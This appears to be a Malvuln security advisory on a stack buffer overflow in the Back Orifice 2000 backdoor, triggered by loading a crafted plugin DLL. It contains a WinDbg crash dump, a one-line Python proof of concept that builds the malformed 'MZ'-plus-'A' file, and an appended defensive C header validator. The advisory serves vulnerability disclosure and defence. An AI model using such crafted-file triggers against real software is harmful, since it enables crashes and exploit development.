Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/abc6a590d237b8ee180638007f67089e.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.BO2K.11.d
Vulnerability: Local Stack Buffer Overflow
Description: Back Orifice 2000 by Cult of the Dead Cow, stack BOF on corrupted DLL plugin import. Loading a specially crafted (DLL) file triggers a stack buffer overflow overwriting the EDX register.
Type: PE32
MD5: abc6a590d237b8ee180638007f67089e
Vuln ID: MVID-2021-0328
ASLR: False
DEP: False
Safe SEH: True
Disclosure: 08/30/2021

Memory Dump:
(ef4.bec): Access violation - code c0000005 (first/second chance not available)
eax=00000000 ebx=00000000 ecx=07aa0000 edx=41414141 esi=00000003 edi=00000003
eip=76fced3c esp=0019e42c ebp=0019e5bc iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
ntdll!ZwWaitForMultipleObjects+0xc:
76fced3c c21400 ret 14h

0:000> .ecxr
eax=07aa0000 ebx=00000001 ecx=07aa0000 edx=41414141 esi=00437400 edi=0019faa4
eip=00403f9a esp=0019ed4c ebp=0019ed7c iopl=0 nv up ei ng nz na pe cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210287
*** WARNING: Unable to verify checksum for Backdoor.Win32.BO2K.11.d.abc6a590d237b8ee180638007f67089e
*** ERROR: Module load completed but symbols could not be loaded for Backdoor.Win32.BO2K.11.d.abc6a590d237b8ee180638007f67089e
Backdoor_Win32_BO2K_11_d+0x3f9a:
00403f9a 813c1050450000 cmp dword ptr [eax+edx],4550h ds:002b:48eb4141=????????

0:000> !analyze -v
*******************************************************************************
*                                                                             *
*                        Exception Analysis                                   *
*                                                                             *
*******************************************************************************

FAULTING_IP:
Backdoor_Win32_BO2K_11_d+3f9a
00403f9a 813c1050450000 cmp dword ptr [eax+edx],4550h

EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 00403f9a (Backdoor_Win32_BO2K_11_d+0x00003f9a)
   ExceptionCode: c0000005 (Access violation)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 00000000
   Parameter[1]: 48eb4141
Attempt to read from address 48eb4141

PROCESS_NAME: Backdoor.Win32.BO2K.11.d.abc6a590d237b8ee180638007f67089e

OVERLAPPED_MODULE: Address regions for 'iertutil' and 'audiodev.dll' overlap

ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_PARAMETER1: 00000000

EXCEPTION_PARAMETER2: 48eb4141

READ_ADDRESS: 48eb4141

FOLLOWUP_IP:
Backdoor_Win32_BO2K_11_d+3f9a
00403f9a 813c1050450000 cmp dword ptr [eax+edx],4550h

MOD_LIST:

NTGLOBALFLAG: 0

APPLICATION_VERIFIER_FLAGS: 0

FAULTING_THREAD: 00000bec

BUGCHECK_STR: APPLICATION_FAULT_INVALID_POINTER_READ_FILL_PATTERN_41414141

PRIMARY_PROBLEM_CLASS: INVALID_POINTER_READ_FILL_PATTERN_41414141

DEFAULT_BUCKET_ID: INVALID_POINTER_READ_FILL_PATTERN_41414141

LAST_CONTROL_TRANSFER: from 00404754 to 00403f9a

STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
0019ed7c 00404754 07aa0000 0019edb9 00000000 Backdoor_Win32_BO2K_11_d+0x3f9a
0019eeb0 004047a0 02765a20 00000000 00000000 Backdoor_Win32_BO2K_11_d+0x4754
0019eec4 004100f3 02765a20 0019faa4 00000001 Backdoor_Win32_BO2K_11_d+0x47a0
0019eee0 00410578 02765a20 0019faa4 00437400 Backdoor_Win32_BO2K_11_d+0x100f3
0019f350 00420f60 00437400 00000111 0019f390 Backdoor_Win32_BO2K_11_d+0x10578
0019f360 004210ed 0019faa4 00000003 00000000 Backdoor_Win32_BO2K_11_d+0x20f60
0019f390 0041fb67 00000003 00000000 00000000 Backdoor_Win32_BO2K_11_d+0x210ed
0019f3b4 00422d5e 00000003 00000000 00000000 Backdoor_Win32_BO2K_11_d+0x1fb67
0019f404 0042279a 00000000 000d0392 0019faa4 Backdoor_Win32_BO2K_11_d+0x22d5e
0019f480 0042274c 00000111 00000003 000d0392 Backdoor_Win32_BO2K_11_d+0x2279a
0019f4a0 004217b2 00000111 00000003 000d0392 Backdoor_Win32_BO2K_11_d+0x2274c
0019f500 004219ba 00000000 000907d4 00000111 Backdoor_Win32_BO2K_11_d+0x217b2
0019f51c 76d7e0bb 000907d4 00000111 00000003 Backdoor_Win32_BO2K_11_d+0x219ba
0019f548 76d88849 0042198f 000907d4 00000111 user32!_InternalCallWinProc+0x2b
0019f56c 76d8b145 00000111 00000003 000d0392 user32!InternalCallWinProc+0x20
0019f63c 76d8a89c 0042198f 00000000 00000111 user32!UserCallWinProcCheckWow+0x1be
0019f6a8 76d6b95b 02cafd10 00000000 000d0392 user32!SendMessageWorker+0x6ff
0019f6d0 76d85493 000907d4 00000111 00000003 user32!SendMessageW+0x5b
0019f6f8 76d84dda 02c6eaa0 00000000 00000000 user32!xxxButtonNotifyParent+0x66
0019f720 76d84240 027a4f38 00000000 02c6eaa0 user32!xxxBNReleaseCapture+0x150
0019f7b8 76d836c6 02c6eaa0 00000000 00000202 user32!ButtonWndProcWorker+0xad0
0019f7ec 76d7e0bb 000d0392 00000202 00000000 user32!ButtonWndProcA+0x56
0019f818 76d88849 76d83670 000d0392 00000202 user32!_InternalCallWinProc+0x2b
0019f83c 76d8b145 00000202 00000000 00100022 user32!InternalCallWinProc+0x20
0019f90c 76d790dc 87d9fbc0 00007ff9 00000202 user32!UserCallWinProcCheckWow+0x1be
0019f978 76d6b2ee 00000000 00442ba0 00442b98 user32!DispatchMessageWorker+0x4ac
0019f9a8 76d6b0cc 000907d4 00442b98 00442b98 user32!IsDialogMessageW+0x17e
0019f9dc 0042444a 000907d4 00442b98 0019faa4 user32!IsDialogMessageA+0x13c
00442b98 00000000 00000000 00100022 005f107c Backdoor_Win32_BO2K_11_d+0x2444a

STACK_COMMAND: ~0s; .ecxr ; kb

SYMBOL_STACK_INDEX: 0

SYMBOL_NAME: Backdoor_Win32_BO2K_11_d+3f9a

FOLLOWUP_NAME: MachineOwner

MODULE_NAME: Backdoor_Win32_BO2K_11_d

IMAGE_NAME: Backdoor.Win32.BO2K.11.d.abc6a590d237b8ee180638007f67089e

DEBUG_FLR_IMAGE_TIMESTAMP: 3dcbc5d0

BUCKET_ID: APPLICATION_FAULT_INVALID_POINTER_READ_FILL_PATTERN_41414141_Backdoor_Win32_BO2K_11_d+3f9a

FAILURE_BUCKET_ID: INVALID_POINTER_READ_FILL_PATTERN_41414141_c0000005_Backdoor.Win32.BO2K.11.d.abc6a590d237b8ee180638007f67089e!Unknown

Exploit/PoC:
1) Create new server
2) Plugins/Configure/Plugin Configuration/insert
3) python -c "print('MZ'+'A'*10000)" > BOOM.dll
4) Load the corrupt DLL

Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).
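
Added example (not part of the Malvuln advisory and not BO2K code): the faulting instruction in the dump compares the dword at eax+edx with 4550h, the PE signature value, while edx holds 41414141 from the crafted file. The sketch below shows the range check a plugin loader performs on a file-supplied header offset before forming that address. Reading edx as the DOS header's e_lfanew field is an inference from the dump, and pe_check_headers and the other names are hypothetical.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Result codes for the hypothetical validator below. */
enum pe_check { PE_OK = 0, PE_TOO_SMALL, PE_NO_MZ, PE_BAD_LFANEW, PE_NO_SIG };

/* Read a little-endian 32-bit value without alignment assumptions. */
static uint32_t rd32(const uint8_t *p) {
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 |
           (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Validate the DOS header and PE signature of a file image of `len` bytes.
 * Every offset taken from the file is range-checked before it is used
 * to form a pointer. */
enum pe_check pe_check_headers(const uint8_t *buf, size_t len) {
    const size_t DOS_HDR_SIZE = 0x40; /* sizeof(IMAGE_DOS_HEADER) */
    const size_t LFANEW_OFF = 0x3C;   /* offset of e_lfanew */
    const size_t NT_MIN = 4 + 20;     /* signature + IMAGE_FILE_HEADER */

    if (buf == NULL || len < DOS_HDR_SIZE) return PE_TOO_SMALL;
    if (buf[0] != 'M' || buf[1] != 'Z') return PE_NO_MZ;

    uint32_t lfanew = rd32(buf + LFANEW_OFF);
    /* e_lfanew must leave room for the NT headers inside the file.
     * Compared against len - NT_MIN so the arithmetic cannot wrap.
     * Conservative choice: headers overlapping the DOS header are rejected. */
    if (lfanew < DOS_HDR_SIZE || len < NT_MIN || lfanew > len - NT_MIN)
        return PE_BAD_LFANEW;

    if (rd32(buf + lfanew) != 0x00004550u) return PE_NO_SIG; /* "PE\0\0" */
    return PE_OK;
}

/* Constructed sample shaped like the advisory's file: "MZ" then 'A' bytes,
 * so the dword at offset 0x3C is 0x41414141. */
enum pe_check demo_advisory_input(void) {
    static uint8_t f[10002];
    memset(f, 'A', sizeof f);
    f[0] = 'M';
    f[1] = 'Z';
    return pe_check_headers(f, sizeof f);
}
```

With this check the crafted file is rejected with PE_BAD_LFANEW before any address derived from the file is dereferenced.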